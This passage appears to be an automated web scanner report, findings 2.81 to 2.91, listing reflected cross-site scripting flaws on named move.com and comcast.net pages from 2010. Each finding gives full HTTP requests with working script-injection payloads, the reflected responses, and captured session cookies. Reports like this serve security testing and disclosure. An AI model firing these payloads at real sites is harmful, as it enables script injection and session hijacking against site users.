The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eeab--><script>alert(1)</script>e67e3e5ac27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-cumming?8eeab--><script>alert(1)</script>e67e3e5ac27=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=miux5fiavgqssc55vsdsj1fu; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 177912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab--><script>alert(1)</script>e67e3e5ac27=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab-->
...[SNIP]...

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cb2"><script>alert(1)</script>7ee17c50deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-fairburn?87cb2"><script>alert(1)</script>7ee17c50deb=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ynu2qo45clascx550mcaoj55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2"><script>alert(1)</script>7ee17c50deb=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2">
...[SNIP]...

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eee0f--><script>alert(1)</script>09637d22ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-fairburn?eee0f--><script>alert(1)</script>09637d22ded=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=q1xasr45fxifggbzycoaffaj; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174043


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f--><script>alert(1)</script>09637d22ded=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f-->
...[SNIP]...

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eceb9--><script>alert(1)</script>5ed8962a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-88/city-brunswick?eceb9--><script>alert(1)</script>5ed8962a388=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=vjatx5uqlqfsm355x5tuse55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9--><script>alert(1)</script>5ed8962a388=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9-->
...[SNIP]...

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f3d6"><script>alert(1)</script>bb971aa3775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-88/city-brunswick?8f3d6"><script>alert(1)</script>bb971aa3775=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zb5gvi55pvzzqgnbdz4mxxal; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6"><script>alert(1)</script>bb971aa3775=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6">
...[SNIP]...

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomesresource.move.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bccb"><script>alert(1)</script>564fcb63a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1 HTTP/1.1
Host: newhomesresource.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:59 GMT
X-Powered-By: ASP.NET
Content-Length: 6887
Content-Type: text/html
Expires: Sun, 12 Dec 2010 19:33:59 GMT
Set-Cookie: Resource=FirstURL=%2Fhome%2Fdefault%2Easp%3F2bccb%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E564fcb63a16%3D1; path=/
Set-Cookie: ASPSESSIONIDCAADCABR=JFBKCHGCKMIDKNMBIEIOHBPM; path=/
Cache-control: private


           <td width="100%" valign="top">

<html>
<head>
   <title>Move</title>
   <link rel="stylesheet" href="../css/global.css" type="text/css">
   <link rel="stylesheet" href="../css/listings.css" type=
...[SNIP]...
<input type="HIDDEN" name="LoginSource" value="/home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1">
...[SNIP]...

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db79e"><script>alert(1)</script>59b0b45d706 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/2106404168/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16474"><script>alert(1)</script>d5ba4c93f37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1495288859/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84a0"><script>alert(1)</script>ca5da6eb0ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 645
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/L/481562361/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986 was submitted in the REST URL parameter 8. This input was echoed as d3a82"><img src=a onerror=alert(1)>ac347692986 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1228415634/x37d3a82"><img src=a onerror=alert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1da"><script>alert(1)</script>7f1b0dd1ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?5e1da"><script>alert(1)</script>7f1b0dd1ebc=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1777652602/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&5e1da"><script>alert(1)</script>7f1b0dd1ebc=1" WIDTH=2 HEIGHT=2>

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525df"><script>alert(1)</script>294ed56285c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

